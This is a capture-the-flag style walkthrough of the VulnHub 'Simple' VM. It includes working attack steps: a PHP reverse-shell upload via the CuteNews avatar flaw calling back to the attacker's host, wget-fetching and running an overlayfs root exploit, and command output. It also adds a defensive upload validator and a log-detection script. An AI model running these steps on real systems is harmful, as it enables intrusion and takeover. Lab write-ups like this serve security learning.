BNE0x03 - Simple Walkthrough

This is my first VulnHub write-up. I've accrued many folders in my KeepNote and decided it was time to post them in a centralized location to help myself become better at documenting my findings. More than likely the first few posts will be very simple and will not have much narrative. As I become more comfortable, I will start to add my own spin on things. Let's do this.

This VM is called SecTalks: BNE0x03 - Simple and was created by Robert Winkel.

I spin up the VM in VirtualBox and kick off an nmap scan on my vboxnet0 interface 192.168.56.0/24:

root@localhost:~/VM/simple-vm# nmap 192.168.56.0/24

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-10 20:02 CDT
Nmap scan report for 192.168.56.100
Host is up (0.000055s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:E1:F0:DE (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.104
Host is up (0.00014s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:60:21:5C (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.1
Host is up (0.0000020s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE
111/tcp open  rpcbind

Nmap done: 256 IP addresses (3 hosts up) scanned in 7.79 seconds
root@localhost:~/VM/simple-vm#

I see that 192.168.56.104 is the box in question. It's time to perform a deeper scan on the host:

root@localhost:~/VM/simple-vm# nmap -p- 192.168.56.104

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-10 20:06 CDT
Nmap scan report for 192.168.56.104
Host is up (0.00011s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:60:21:5C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.77 seconds
root@localhost:~/VM/simple-vm# 


Looks like this host has only one port open, 80. Let's take a look at what's being served there. I navigate to the web page and I'm presented with a CuteNews v.2.0.3 login page.

After performing some research, I see that CuteNews v.2.0.3 is vulnerable to a Remote File Upload vulnerability. Looking at the details of the vulnerability, the following steps need to be performed in order to exploit it (quoted from the published exploit description):

1 - Sign up for a new user
2 - Log in
3 - Go to Personal options: http://www.target.com/cutenews/index.php?mod=main&opt=personal
4 - Select Upload Avatar, for example Evil.jpg
5 - Use Tamper Data to rename the file Evil.jpg to Evil.php in the multipart request:

    -----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\

6 - Your shell: http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php
    Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php
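What those steps rely on is a server that stores the upload under whatever extension the client put in the Content-Disposition header. As an added example (my own code, not CuteNews's), here is what a hardened avatar handler checks instead: it parses the filename out of the multipart header, strips any path components, requires the extension to be on an image allowlist and to agree with the file's leading bytes, refuses PHP open tags inside the body, and then stores the file under a random server-chosen name whose extension comes from the sniffed content, never from the client. The function names and the 512 KiB size limit are assumptions for illustration.

```python
import os
import secrets
from email.message import Message

# Added example, not CuteNews code: server-side checks an avatar upload
# handler should perform instead of trusting the client-supplied filename.

# Only image types are acceptable for an avatar. Extension AND magic bytes
# must agree, and the extension is re-derived by the server.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
_EXT_ALIASES = {"jpeg": "jpg"}


def filename_from_disposition(header_value):
    """Extract the filename parameter from a multipart Content-Disposition
    header (the header Tamper Data edits in the write-up), dropping any
    client-supplied directory components."""
    msg = Message()
    msg["Content-Disposition"] = header_value
    name = msg.get_filename()
    if not name:
        return None
    return os.path.basename(name.replace("\\", "/"))


def sniff_type(data):
    """Return the image type implied by the file's leading bytes, or None."""
    for ext, magics in ALLOWED_TYPES.items():
        if any(data.startswith(m) for m in magics):
            return ext
    return None


def validate_avatar(client_filename, data, max_bytes=512 * 1024):
    """Return (ok, reason, storage_name).

    storage_name is random and carries the extension derived from the
    content, so a client-supplied 'Evil.php' can never reach disk under a
    script extension even if every other check were bypassed."""
    if not client_filename:
        return False, "missing filename", None
    if len(data) > max_bytes:
        return False, "file too large", None
    ext = client_filename.rsplit(".", 1)[-1].lower() if "." in client_filename else ""
    ext = _EXT_ALIASES.get(ext, ext)
    if ext not in ALLOWED_TYPES:
        return False, f"extension '{ext}' not allowed", None
    sniffed = sniff_type(data)
    if sniffed is None:
        return False, "content is not a recognised image", None
    if sniffed != ext:
        return False, f"extension .{ext} does not match content ({sniffed})", None
    # Reject PHP open tags even behind a valid image header: a polyglot is
    # only harmless if the web server never executes anything in uploads/.
    if b"<?php" in data or b"<?=" in data:
        return False, "script tag found inside image data", None
    storage_name = f"avatar_{secrets.token_hex(16)}.{sniffed}"
    return True, "ok", storage_name
```

The second half of the fix is configuration rather than code: the uploads directory should be served with script execution disabled (or live outside the web root entirely), so that even a file that slips past validation is returned as static bytes instead of being run.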

Time to get to work. I create a new user by clicking (register) and entering the following:

Username: geoda
Nickname: geoda
Password: geodageoda
Confirm: geodageoda
Email: geoda@geoda.com


I log in and click on Personal options.

At this point, I need to upload an avatar that is really my PHP reverse shell. Lucky for me, and thanks to pentestmonkey, there's a reverse shell already shipped with Kali!

This reverse shell is located at /usr/share/webshells/php/php-reverse-shell.php.

I copy this file down and save it as Evil.jpg:

root@localhost:~/VM/simple-vm# cat Evil.jpg 
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

[...snippet...]

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.1';  // CHANGE THIS
$port = 443;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

[...snippet...]

root@localhost:~/VM/simple-vm# 

As shown above, I updated the IP and Port to 192.168.56.1 and 443 respectively.

Now that I have my reverse shell in order, it's time to upload it to CuteNews, intercept the request with Tamper Data and rename the file to the proper .php extension.

I click Browse..., locate my Evil.jpg reverse shell and press Okay. I then fire up Tamper Data and press Save Changes.

Tamper Data immediately captures my request and asks if I'd like to tamper with it. I say yes.

Per the exploit, I need to change Evil.jpg to Evil.php within the POST_DATA parameter: the filename="Evil.jpg" in the Content-Disposition header of the avatar_file part becomes filename="Evil.php".

I press Okay and submit the modified request. With a netcat listener waiting on port 443, I navigate to my uploaded file and a reverse shell should pop.


Success!! I am on the box as the www-data user.
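From the web server's side, the whole chain above leaves a distinctive trace in the access log: a POST to the personal-options form, followed shortly by a request for a .php resource under /cutenews/uploads/, a directory that should only ever serve images. The detection below is an added example of mine, not part of the write-up or of CuteNews; the Apache combined-format log lines are constructed to resemble the traffic described above, and the ten-minute correlation window is an assumption.

```python
import re
from datetime import datetime, timedelta

# Added example: detection logic over Apache combined-format access logs.
# The lines below are CONSTRUCTED to mirror the write-up's traffic; they are
# not taken from the VM.
SAMPLE_LOG = """\
192.168.56.1 - - [10/Aug/2016:20:40:01 -0500] "GET /cutenews/index.php?mod=main&opt=personal HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.56.1 - - [10/Aug/2016:20:41:12 -0500] "POST /cutenews/index.php?mod=main&opt=personal HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.56.1 - - [10/Aug/2016:20:41:30 -0500] "GET /cutenews/uploads/avatar_geoda_Evil.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.56.1 - - [10/Aug/2016:20:42:00 -0500] "GET /cutenews/uploads/avatar_geoda_cat.jpg HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Aug/2016:21:00:00 -0500] "GET /cutenews/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD path proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Extensions the PHP handler would normally execute.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\?|$)", re.IGNORECASE)
UPLOAD_DIR = "/cutenews/uploads/"
AVATAR_FORM = "/cutenews/index.php?mod=main&opt=personal"


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect(log_text, window=timedelta(minutes=10)):
    """Return a list of (rule, client_ip, path) alerts.

    Rule 1 (script_in_upload_dir): any request for a script extension under
            the avatar upload directory; nothing there should be executable.
    Rule 2 (avatar_upload_then_exec): the same client POSTed to the avatar
            form within `window` before requesting that script."""
    alerts = []
    last_avatar_post = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        ip, path = rec["ip"], rec["path"]
        if rec["method"] == "POST" and path.startswith(AVATAR_FORM):
            last_avatar_post[ip] = rec["ts"]
        if path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            alerts.append(("script_in_upload_dir", ip, path))
            prev = last_avatar_post.get(ip)
            if prev is not None and rec["ts"] - prev <= window:
                alerts.append(("avatar_upload_then_exec", ip, path))
    return alerts


if __name__ == "__main__":
    for rule, ip, path in detect(SAMPLE_LOG):
        print(f"{rule}: {ip} -> {path}")
```

Rule 1 alone is enough to catch this case and is cheap to run continuously; rule 2 adds the context an analyst wants when triaging (which account's upload form was used, and from where), and the window keeps it from firing on an unrelated scan of the uploads directory hours later.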

First things first, I break out of my "jail" (the non-interactive shell) by spawning a proper TTY with python:


$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@simple:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@simple:/$ 

I then navigate around the box and see that it is running Ubuntu 14.04 with kernel 3.16 (3.16.0-30-generic):


www-data@simple:/$ cat /proc/version
cat /proc/version
Linux version 3.16.0-30-generic (buildd@phianna) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015
www-data@simple:/$ 

This kernel is vulnerable to an 'overlayfs' local root shell exploit.

I download the exploit (37292.c) to my local host, place it in my web root at /var/www/html and start Apache:


root@localhost:/var/www/html# ls 37292.c 
37292.c
root@localhost:/var/www/html# 

On the remote host, I fetch the exploit into the /tmp directory with wget and compile it:


www-data@simple:/tmp$ wget http://192.168.56.1/37292.c -O exploit.c
wget http://192.168.56.1/37292.c -O exploit.c
--2016-08-10 23:27:05--  http://192.168.56.1/37292.c
Connecting to 192.168.56.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4969 (4.9K) [text/x-csrc]
Saving to: 'exploit.c'

100%[======================================>] 4,969       --.-K/s   in 0s      

2016-08-10 23:27:05 (1.27 GB/s) - 'exploit.c' saved [4969/4969]

www-data@simple:/tmp$ gcc exploit.c -o exploit
gcc exploit.c -o exploit
www-data@simple:/tmp$ 

Now that my exploit is compiled, I verify my current user and then launch it:


www-data@simple:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@simple:/tmp$ ./exploit
./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# 

Success! I am now running as root! I navigate to the /root directory and cat the flag.txt:


# cd /root
cd /root
# ls
ls
flag.txt
# cat flag.txt
cat flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!
# 

This was a great first VM to publish and I enjoyed utilizing 2 vulnerabilities (1 for remote access and the other for privilege escalation).

Thanks to Robert Winkel for creating this VM, and thanks to VulnHub for hosting it!